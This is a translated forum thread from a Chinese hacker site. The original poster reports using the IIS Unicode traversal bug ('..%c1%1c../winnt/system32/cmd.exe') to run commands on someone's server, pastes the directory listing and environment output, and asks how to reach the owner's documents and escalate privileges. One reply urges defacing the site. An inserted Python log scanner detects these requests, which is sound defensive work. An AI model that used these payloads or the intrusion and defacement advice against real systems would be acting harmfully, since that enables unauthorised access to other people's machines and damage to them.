Forum: Newbie Paradise    Title: And then what? What do I do???
Author: lankykin [lankykin]    Forum user
Everyone, I have the following problem. I used the IIS vulnerability, namely http://IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:, and got the directory listing of a machine as follows:
 Directory of C:\

2001-05-15  20:33       <DIR>          SYS98H
2000-10-08  12:28       <DIR>          WINDOWS
2000-10-08  12:28       <DIR>          REALMODE
2000-10-08  12:35       <DIR>          Program Files
2000-10-08  13:24       <DIR>          My Documents
2002-01-07  15:34                  714 FRONTPG.LOG
2002-01-07  15:50       <DIR>          UNPACK
2001-12-19  09:28               20,946 ~WRD3439.tmp
2000-11-01  10:53       <DIR>          safe
2001-05-15  20:33       <DIR>          SYS98
2001-11-10  19:48       <DIR>          KV-Back.Vir
2000-10-08  13:29                  281 CONFIG.PCC
2000-11-21  20:51               84,374 HS45.EXE
2000-11-27  15:27               17,868 JIANKA~1.HTM
2000-10-08  13:30                  482 AUTOEXEC.DO_
2000-10-08  13:24                  519 AUTOEXEC.PCC
2000-10-08  14:08                  310 CONFIG.001
2000-10-30  15:38                1,388 FRUNLOG.TXT
2000-10-08  12:42                2,164 PDOS.DEF
2000-10-10  15:47                  225 RESETLOG.TXT
2002-01-07  15:38                6,348 SCANDISK.LOG
2000-11-01  10:42                  884 SETUPXLG.TXT
2000-10-30  18:26            3,047,456 SYSTEM.NEW
2000-10-30  18:25              290,848 USER.NEW
2000-11-10  16:15                  256 ZH.DAT
2000-12-01  10:00            2,142,432 WINAMP~1.EXE
2000-12-23  11:43               35,409 WORD.HTM
2000-12-01  10:32                  291 快捷方~1.LNK
2001-01-03  13:39                7,454 DANCI.HTM
2001-12-20  19:56       <DIR>          kejian
2001-05-15  21:41       <DIR>          C-Media
2001-05-17  09:59       <DIR>          Inetpub
2002-01-03  13:59       <DIR>          TEMP
2001-05-25  21:15                  131 APInstall.log
2001-09-03  22:29                    3 Count.txt
              22 File(s)      5,660,783 bytes
              13 Dir(s)      93,011,968 bytes free
Then I used
http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set
and got its settings as follows:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:


ALLUSERSPROFILE=E:\Documents and Settings\All Users
CommonProgramFiles=E:\Program Files\Common Files
COMPUTERNAME=PING
ComSpec=E:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=10.10.1.95
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_VIA=1.0 fee-server
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=10.10.1.95
NUMBER_OF_PROCESSORS=1
Os2LibPath=E:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=E:\WINNT\system32;E:\WINNT;E:\WINNT\System32\Wbem
PATH_TRANSLATED=e:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fam
Now the question is: I want to get into his documents; how do I get in? I also got a USER account; how should I raise my privileges???

OP    Posted: 1/10 15:8
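Seen from the defending side, the requests quoted in the post above leave a recognisable trace in the web server log. The following is an added example, not code from this thread or from 20CN: it reproduces the over-lenient two-byte decoding that turns `%c1%1c` into a backslash and `%c0%af` into a slash, and flags any logged request whose decoded path climbs above the virtual root. The log lines are constructed samples, and the assumption that the URI stem is logged percent-encoded as the client sent it is mine.

```python
from urllib.parse import unquote_to_bytes

def lax_utf8_decode(raw: bytes) -> str:
    """Reproduce the lenient 2-byte decoding behind the %c1%1c trick: a lead byte
    in 0xC0-0xDF is combined with WHATEVER byte follows, with no check that it is
    a valid continuation byte (0x80-0xBF). So 0xC1 0x1C -> 0x5C, 0xC0 0xAF -> 0x2F."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            # ASCII passes through; any other stray byte becomes a placeholder
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out)

def escapes_webroot(uri_stem: str) -> bool:
    """True when the decoded path has more '..' steps than directories before them,
    i.e. it climbs above the root. '/' and '\\' both count as separators (Windows)."""
    path = lax_utf8_decode(unquote_to_bytes(uri_stem)).replace("\\", "/")
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

# Constructed log lines, simplified W3C layout: date time c-ip method uri-stem uri-query status.
# Assumption: the stem is logged percent-encoded, exactly as the client sent it.
LOG_LINES = [
    "2002-01-10 15:08:01 10.10.1.7 GET /default.htm - 200",
    "2002-01-10 15:08:12 10.10.1.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir+c: 200",
    "2002-01-10 15:08:30 10.10.1.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+set 502",
    "2002-01-10 15:09:02 10.10.1.9 GET /scripts/../default.htm - 200",
]

def scan_log(lines):
    """Return (client_ip, uri_stem) for every request whose path escapes the root."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 7 and escapes_webroot(parts[4]):
            hits.append((parts[2], parts[4]))
    return hits
```

A naive scanner that looks for the literal string `../` misses both flagged requests, because the `..` segments are only joined once the bogus two-byte sequence has been decoded.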

Reply: xiaoxingchi [xiaoxingchi]    Forum user
http://www.20cn.net/ns/hk/hacker/data/20010128103456.htm

There is an article here; you can take it from there and work out the rest...


Floor B1    Posted: 1/11 1:14

Reply: live_learn [live_learn]    Forum user
holy fuck. you don't need to elevate your usage level! you are the root now! that leak is a fucking idiotic, moron-like leak and it's damn lucky to find it. fuck that system maintainer, he/she should go to hell!
I suggest you change his/her index.html, and teach him/her a lesson.
do you understand what I am talking about? damn, I can't type Chinese. basically what I am saying here is that you have the editing right in that system. you can't write whatever you want.

Floor B2    Posted: 1/11 11:17

Reply: group [group]    Forum user
Could you please use less foul language? I'm a bit of a clean freak...

Floor B3    Posted: 1/12 0:41

Reply: xjliuwei [xjliuwei]    Forum user
I can't solve this problem right now! But you can go and have a look in cy07! Thanks!

Floor B4    Posted: 04-06-09 06:05

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software by NetDemon

Guangdong ICP licence no. 05087286 (粤ICP备05087286号)